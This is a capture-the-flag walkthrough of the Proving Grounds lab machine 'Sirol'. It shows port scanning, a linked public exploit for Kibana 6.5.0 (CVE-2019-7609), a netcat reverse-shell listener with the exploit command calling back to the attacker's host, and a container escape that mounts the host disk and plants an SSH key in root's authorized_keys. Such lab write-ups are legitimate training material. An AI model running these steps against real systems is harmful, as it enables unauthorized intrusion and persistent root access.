📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Web enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. Proving Grounds - Practice

Sirol

PreviousUT99NextTwiggy

Last updated 3 years ago

Was this helpful?

nmap

nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Kibana is running on port 5601

Web enumeration

Looks like Kibana is running on version 6.5.0 which is vulnerable to Remote Code Execution.

Exploitation

Set a reverse shell listener

sudo nc -lvnp 80

Run the exploit

python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shell

And you should receive a root shell inside a Docker container.

Privilege Escalation

Looks like --privilege flag is set since we can run fdisk -l

Let's mount /dev/sda1 

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Create .ssh folder on /root 

cd /mnt/hola/root
mkdir .ssh
cd .ssh

Copy your .ssh/id_rsa.pub and paste it to the remote machine's .ssh/authorized_keys

echo 'insert your public ssh key' > authorized_keys

Now you can SSH directly to the machine and escape the container.

Thanks for reading and enjoy the rest of your day!

Visit and copy the python exploit to your local machine.

https://github.com/LandGrey/CVE-2019-7609/